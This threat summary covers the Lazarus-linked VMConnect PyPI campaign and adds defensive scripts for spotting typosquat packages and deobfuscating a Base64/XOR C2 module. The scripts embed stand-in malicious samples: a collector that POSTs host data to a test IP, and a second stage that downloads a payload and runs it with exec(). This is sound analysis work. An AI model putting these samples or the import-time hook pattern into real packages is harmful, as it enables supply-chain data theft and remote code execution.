North Korean Hackers Behind Malicious VMConnect PyPI Campaign

Cyber Security Threat Summary:
“North Korean state-sponsored hackers are behind the VMConnect campaign that uploaded to the PyPI (Python Package Index) repository malicious packages, one of them mimicking the VMware vSphere connector module vConnector. The packages were uploaded at the beginning of August, with one named VMConnect targeting IT professionals seeking virtualization tools” (Bleeping Computer, 2023).

Although the package has since been removed from PyPI, VMConnect was downloaded 237 times before its removal. Two other packages carrying the same code were also found, named ‘ether’ and ‘quantiumbase.’ These two impersonated popular software projects and were downloaded 253 and 216 times respectively.

ReversingLabs, which specializes in software supply chain attack research, attributes the campaign to Labyrinth Chollima, a subgroup of the North Korean Lazarus hacking group.

Security Officer Comments:
The researchers discovered more packages that are part of the same VMConnect operation: ‘tablediter’ (736 downloads), ‘request-plus’ (43 downloads), and ‘requestspro’ (341 downloads). These malicious packages mimic popular tools for editing tables and making HTTP requests. By appending “plus” or “pro” to a well-known package name, the attackers try to trick victims into installing what looks like a version with more features. The malicious packages reuse the description of the originals and differ only minimally in file structure and content; the modifications primarily concern the “__init__[.]py” file, which executes a malicious function from ‘cookies[.]py’ that triggers data collection from the infected machine, so the collection runs as soon as the package is imported.
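The two tells described above, a look-alike name built from a popular package plus a “plus”/“pro” suffix, and an `__init__.py` that calls into a sibling module at import time, can both be checked statically before a package is ever imported. The following triage script is an added example written for this summary, not code from ReversingLabs or from the malicious packages; the `POPULAR` baseline, the suffix list and the indicator sets are assumptions, and the `requestspro` package it builds in a temporary directory is a constructed stand-in that is parsed but never executed:

```python
import ast
import tempfile
from pathlib import Path

# Assumed baseline of legitimate names that the look-alikes imitate.
POPULAR = {"requests", "vconnector", "tabulate"}
SUFFIXES = ("-plus", "_plus", "plus", "-pro", "_pro", "pro")
NETWORK = {"urlopen", "Request", "socket", "post"}          # assumed indicators
STAGING = {"b64decode", "b64encode", "exec", "eval"}         # assumed indicators

# Constructed stand-in for a repackaged project: the upstream surface (api.py)
# is kept, __init__.py gains one import-time call, and cookies.py holds the
# collector. 203.0.113.10 is an RFC 5737 test address; nothing here is run.
API_SRC = "def get(url):\n    return url\n\ndef post(url, data=None):\n    return url\n"
INIT_SRC = "from .api import get, post\nfrom .cookies import collect\ncollect()\n"
COOKIES_SRC = (
    "import base64, json, platform, urllib.request\n\n"
    "def collect():\n"
    "    info = json.dumps({'host': platform.node(), 'os': platform.platform()})\n"
    "    req = urllib.request.Request('http://203.0.113.10/',\n"
    "                                 data=base64.b64encode(info.encode()), method='POST')\n"
    "    return urllib.request.urlopen(req).read()\n"
)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name: str):
    """Return the popular package a name imitates after stripping a
    'plus'/'pro' suffix and allowing one edit, or None if it is genuine."""
    stripped = name.lower()
    for suffix in SUFFIXES:
        if stripped.endswith(suffix) and len(stripped) > len(suffix):
            stripped = stripped[: -len(suffix)]
            break
    for real in sorted(POPULAR):
        if name.lower() != real and edit_distance(stripped, real) <= 1:
            return real
    return None


def scan_init(pkg_dir: Path) -> list:
    """Flag bare calls at module level in __init__.py, i.e. code that runs on
    import, and note when the callee comes from a sibling module."""
    findings, sibling = [], {}
    tree = ast.parse((pkg_dir / "__init__.py").read_text())
    for node in tree.body:
        if isinstance(node, ast.ImportFrom) and node.level == 1:
            for alias in node.names:
                sibling[alias.asname or alias.name] = node.module
        elif isinstance(node, ast.Expr) and isinstance(node.value, ast.Call):
            fn = node.value.func
            name = fn.id if isinstance(fn, ast.Name) else ast.unparse(fn)
            origin = f" (from .{sibling[name]})" if name in sibling else ""
            findings.append(f"__init__.py calls {name}() at import time{origin}")
    return findings


def scan_modules(pkg_dir: Path) -> list:
    """Flag any module that combines network I/O with encoding/exec
    primitives, the pairing a collector-plus-stager needs."""
    findings = []
    for path in sorted(pkg_dir.glob("*.py")):
        used = set()
        for node in ast.walk(ast.parse(path.read_text())):
            if isinstance(node, ast.Name):
                used.add(node.id)
            elif isinstance(node, ast.Attribute):
                used.add(node.attr)
        net, stage = used & NETWORK, used & STAGING
        if net and stage:
            findings.append(f"{path.name}: network {sorted(net)} with staging {sorted(stage)}")
    return findings


def build_sample_package(root: Path, name: str = "requestspro") -> Path:
    pkg = root / name
    pkg.mkdir()
    (pkg / "api.py").write_text(API_SRC)
    (pkg / "__init__.py").write_text(INIT_SRC)
    (pkg / "cookies.py").write_text(COOKIES_SRC)
    return pkg


def triage(pkg_dir: Path) -> dict:
    return {"lookalike_of": lookalike_of(pkg_dir.name),
            "init": scan_init(pkg_dir), "modules": scan_modules(pkg_dir)}


def run_demo(name: str = "requestspro") -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        return triage(build_sample_package(Path(tmp), name))


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Run it against an unpacked sdist or wheel directory with `triage(Path("path/to/pkg"))`. None of the checks is proof of malice on its own (plenty of honest packages do work at import time), but a name one edit away from a popular project, combined with an import-time call into a module that both encodes data and opens network connections, is exactly the shape described here and is worth a manual look before installation.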

The malicious packages exfiltrate data from infected machines to the attacker’s command and control (C2) servers via an HTTP POST request. The server responds with a Python module, obfuscated using Base64 and XOR, together with execution parameters. The module also includes the download URL for the next-stage payload, which the researchers were unable to retrieve.
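When a C2 response like this is captured, an analyst wants to strip the Base64 and XOR layers and pull the next-stage URL out of the module without running it. The script below is an added example for this summary, not ReversingLabs' tooling or the attackers' code. It assumes the response is XOR-then-Base64 (the report names the two layers but not their order or key), uses an assumed five-byte key, and the second-stage module it works on is a constructed stand-in with an RFC 5737 test address. It recovers the key with a known-plaintext crib (Python modules usually begin with `import `) and then extracts indicators from the AST rather than executing anything:

```python
import ast
import base64
import re
import string
from itertools import cycle

# Constructed stand-in for the second-stage module the C2 returns. The real
# module was not published; this one only mirrors the described behaviour
# (a next-stage download URL plus a routine that fetches and runs it).
SAMPLE_MODULE = (
    "import urllib.request\n"
    "NEXT_STAGE = 'http://203.0.113.10/update/payload.bin'  # RFC 5737 test address\n"
    "def run(params):\n"
    "    data = urllib.request.urlopen(NEXT_STAGE).read()\n"
    "    exec(data)\n"
)

KEY = b"vmc0n"  # assumed key; the report gives neither the key nor its length

URL_RE = re.compile(r"https?://[^\s'\"]+")
DANGEROUS = {"exec", "eval", "urlopen", "system", "Popen"}
PRINTABLE = set(string.printable)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so it both applies and strips the layer."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def obfuscate(source: str, key: bytes) -> str:
    """Build a Base64(XOR(source)) blob of the kind the C2 is described as returning."""
    return base64.b64encode(xor_bytes(source.encode(), key)).decode()


def deobfuscate(blob: str, key: bytes) -> str:
    return xor_bytes(base64.b64decode(blob), key).decode()


def recover_key(blob: str, crib: bytes = b"import ") -> bytes:
    """Known-plaintext recovery: XOR the ciphertext prefix with the crib to get
    a candidate key of each length up to len(crib), and accept the first one
    whose full decryption is printable and parses as Python."""
    ct = base64.b64decode(blob)
    for n in range(1, len(crib) + 1):
        candidate = xor_bytes(ct[:n], crib[:n])
        try:
            text = xor_bytes(ct, candidate).decode()
            if set(text) <= PRINTABLE:
                ast.parse(text)
                return candidate
        except (UnicodeDecodeError, SyntaxError, ValueError):
            pass
    raise ValueError(f"no key of length <= {len(crib)} fits crib {crib!r}")


def extract_iocs(source: str) -> dict:
    """Static triage of the recovered module: URLs held in string constants
    and calls to download/execute primitives, collected from the AST only."""
    urls, calls = [], set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            urls.extend(URL_RE.findall(node.value))
        elif isinstance(node, ast.Call):
            fn = node.func
            name = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", None)
            if name in DANGEROUS:
                calls.add(name)
    return {"urls": urls, "dangerous_calls": sorted(calls)}


if __name__ == "__main__":
    blob = obfuscate(SAMPLE_MODULE, KEY)          # stand-in for a captured response
    key = recover_key(blob)
    print("recovered key:", key)
    print(extract_iocs(deobfuscate(blob, key)))
```

The crib approach only works when the module starts with predictable bytes and the key is no longer than the crib; for a longer key, extend the crib with more of the expected header (for instance a known first import line) or fall back to frequency analysis on each key position. The point of the AST pass is that the URL and the `exec` path come out of the module without it ever being imported, which is how a C2 response should be handled when, as here, the next stage is unavailable and its behaviour unknown.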

Suggested Correction(s):
ReversingLabs was unable to analyze the final payload but found enough evidence to link the VMConnect campaign to the Lazarus APT group. “One argument is the discovery of the ‘builder[.]py’ file in the malicious packages, which contains the same payload decoding routine that JPCERT, Japan's Computer Security Incident Response Team (CSIRT) found on another file called ‘py_Qrcode.’ JPCERT attributed the code to another Lazarus subgroup they track as DangerousPassword. The functionality of that file is identical to a third one named ‘QRLog’ - a Java-based malware that CrowdStrike has attributed to Labyrinth Chollima with high confidence” (Bleeping Computer, 2023).